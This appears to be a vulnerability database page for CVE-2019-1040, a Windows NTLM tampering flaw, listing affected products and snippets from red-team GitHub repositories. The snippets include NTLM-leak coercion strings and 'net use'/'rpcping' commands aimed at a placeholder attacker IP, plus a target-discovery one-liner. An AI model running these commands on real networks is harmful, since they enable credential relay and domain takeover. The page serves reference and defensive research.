CVE-2019-1040

Published: 12/06/2019 Updated: 24/08/2020
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
CVSS v3 Base Score: 5.9 | Impact Score: 3.6 | Exploitability Score: 2.2
VMScore: 389
CVSS v2 Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

A tampering vulnerability exists in Microsoft Windows when a man-in-the-middle attacker is able to successfully bypass the NTLM MIC (Message Integrity Check) protection, aka 'Windows NTLM Tampering Vulnerability'.

Vulnerable Products

Microsoft Windows Server 2016, version 1903
Microsoft Windows Server 2008
Microsoft Windows RT 8.1
Microsoft Windows 10, version 1803
Microsoft Windows Server 2016, version 1803
Microsoft Windows Server 2012 R2
Microsoft Windows Server 2012
Microsoft Windows Server 2008 R2
Microsoft Windows 10, version 1903
Microsoft Windows 10
Microsoft Windows 10, version 1607
Microsoft Windows 10, version 1703
Microsoft Windows Server 2019
Microsoft Windows Server 2016
Microsoft Windows 8.1
Microsoft Windows 7
Microsoft Windows 10, version 1709
Microsoft Windows 10, version 1809

Github Repositories

Red team reference, modified from Ridter's https://github.com/Ridter/Intranet_Penetration_Tips

Intranet Penetration Cheat Sheets. Modified by: z3r0yu. Blog: zeroyu.xyz. Table of Contents: Information gathering; Open-source intelligence (OSINT) gathering; GitHub; WHOIS lookup / registrant reverse lookup / email reverse lookup / related assets; Google hacking; Building an enterprise password dictionary; Dictionary lists; Password generation; Obtaining email lists; Leaked-password lookup; Gathering information on the enterprise's external footprint; Subdomain enumeration

All_NTLM_leak. PDF file: /F (\\\\IP@80\\t). dubdoc: ///1234@80/t. Doc: Target=file://1234@80/t.dotx. URL: file://IP@80/t.htm. lnk: URL=file://1234@80/t.htm. IconFile: \\1234@80\t.ico. rpcping: rpcping -s 1234 -e 1234 -a privacy -u NTLM. dir: dir \\1234@SSL@443\DavWWWRoot\test.exe. Net command + WebDAV invoke: net use \\1234@80\t; net use * \\1234@SSL@443\folder\subfolder

Author: Evi1cg. Blog: evi1cg.github.io. Table of Contents: Information gathering; Open-source intelligence (OSINT) gathering; GitHub; WHOIS lookup / registrant reverse lookup / email reverse lookup / related assets; Google hacking; Building an enterprise password dictionary; Dictionary lists; Obtaining email lists; Leaked-password lookup; Gathering information on the enterprise's external footprint; Subdomain enumeration; Getting into the intranet; Based on weak enterprise account vulnerabilities; 基

CVE-2019-1040 scanner. Checks for CVE-2019-1040 vulnerability over SMB. The script will establish a connection to the target host(s) and send an invalid NTLM authentication. If this is accepted, the host is vulnerable to CVE-2019-1040 and you can execute the MIC Remove attack with ntlmrelayx. Note that this does not generate failed login attempts as the login information itself

CougarCS InfoSec's multi-API wrapper for CVE and ExploitDB definitions and lookup.

PwnAtlas. PwnAtlas is CougarCS InfoSec's multi-API wrapper module for CVE and ExploitDB lookup. It currently features the ability to look up CVEs by both a keyword search and by their assigned ID. It returns a dictionary of the most important values, which can be used for many purposes, including: Discord bots, websites, Python scripts, etc. Installation. Implementin

CVE-2019-1040 with Exchange

CVE-2019-1040. Great writeup! Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin. So, I wrote CVE-2019-1040.py for easy use. You can also check out my exchange2domain repo: github.com/ridter/exchange2domain, another way to use Exchange to get DC. Requirements: These tools require impacket. You can install it from pip with pip install i

PrinterSpray. Wrapper of github.com/dirkjanm/krbrelayx/blob/master/printerbug.py to be used with a list of IPs. Discover potential targets: crackmapexec smb [subnet] -u '' -p '' -M spooler | grep -a "Spooler service enabled" | awk -F " " '{print$2}' > spooler.txt. Have responde

Techniques that can be used to get from domain user to domain admin

DomainUserToDomainAdminTechniques. Techniques that can be used to get from domain user to domain admin: Powerup; PowerupSQL; Find-InterestingFile; Invoke-Kerberoast; Get-GPPPassword; Bloodhound; Find-localadminaccess; Domain Password Spray; Inveigh - LLMNR/NBNS Poisoning; Get-ExploitableSystem; PowerWebShot; Invoke-ShareFinder / Invoke-FileFinder; SCCM; Matt Nelson

an impacket-dependent script exploiting CVE-2019-1040

dcpwn. An impacket-dependent script exploiting CVE-2019-1040, with code partly borrowed from those security researchers that I'd like to say thanks to. By taking a closer look you'll find the very technique for utilising the vulnerability slightly different to what common belief is.

Updated version of the tool UltraRelay with support for the CVE-2019-1040 exploit

UltraRelay. Updated by Lazaar Sami for the exploit CVE-2019-1040. UltraRelay is a tool for LLMNR poisoning and relaying NTLM credentials. It is based on Responder and impacket. I have updated the original version (github.com/5alt/ultrarelay) for the exploit CVE-2019-1040. Dirk-jan Mollema has updated ntlmrelayx (part of github.com/CoreSecurity/impacket) to have a --

Record of articles read online in 2019

The following is a summary of what I read in each of the 12 months of 2019; most are foreign security articles whose titles I translated into Chinese. Pentesting: Using Exchange in penetration testing (the article provides some good scripts, rather than just brute forcing); The 2019 OSINT Guide: the essence of penetration is information gathering, never give up; there will be a time when you feel you have explored every possibility for obtaining information. Don't give up. 休

Offensive tool to trigger network authentications as SYSTEM

Change-Lockscreen. Change-Lockscreen is a tool to trigger network authentications as SYSTEM by changing the Windows lock screen image from the command line, to perform privilege escalation attacks such as the one described in the post linked below: research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-es

Pentesting Tools quick installer

Usage. EasiWeapons.sh heavily relies on Python virtual environments and uses pipx, poetry and pipenv to orchestrate venvs. In order to launch the bleeding-edge version of a tool installed with pipx and not the version that is already shipped with Kali, you should modify the PATH variable: Modify PATH for a normal user with any method you want (.bashrc / .profile / .zshrc / etc):

Collection of extra pentest tools for Kali Linux

☢️☣️ NOT PROPERLY MAINTAINED ANYMORE. It has become such a pain to properly maintain this repository (every new Kali release very likely breaks some dependencies for at least one of the million listed tools), so a smooth installation process is not guaranteed. Now I treat WeaponizeKali.sh not as an automation script, but as a collection of useful tools (resources) to be

Some domain penetration tricks I have collected; there may be some errors.

Hunting-Active-Directory. Some domain penetration tricks I have collected; there may be some errors. Information gathering. Common commands: Net use; Net view; Tasklist /v; Ipconfig /all; net group /domain (list all domain user groups); net group "domain admins" /domain (list domain administrators); net group "enterprise admins" /domain (list enterprise administrators); net localgroup administra

Collection of reference sites from different fields

Reference and Consultation Websites. Pentest: Pentesting Cheatsheets - github.com/Kitsun3Sec/Pentest-Cheat-Sheets; Pentesting Cheatsheets - ired.team/offensive-security-experiments/offensive-security-cheetsheets; Typical pentest tips - medium.com/bug-bounty-hunting/beginner-tips-to-own-boxes-at-hackthebox-9ae3fec92a96; Assorted techniques - bitvi

Recent Articles

Microsoft Patch Tuesday – June 2019
Symantec Threat Intelligence Blog • Himanshu Mehta • 12 Jun 2024

This month the vendor has patched 88 vulnerabilities, 20 of which are rated Critical.

Posted: 12 Jun, 2019. 31 min read. As always, customers are advised to follow these security best practices: Install vendor patches as soon as they are available. Run all software with the least privileges required while still maintaining functionality. Avoid h...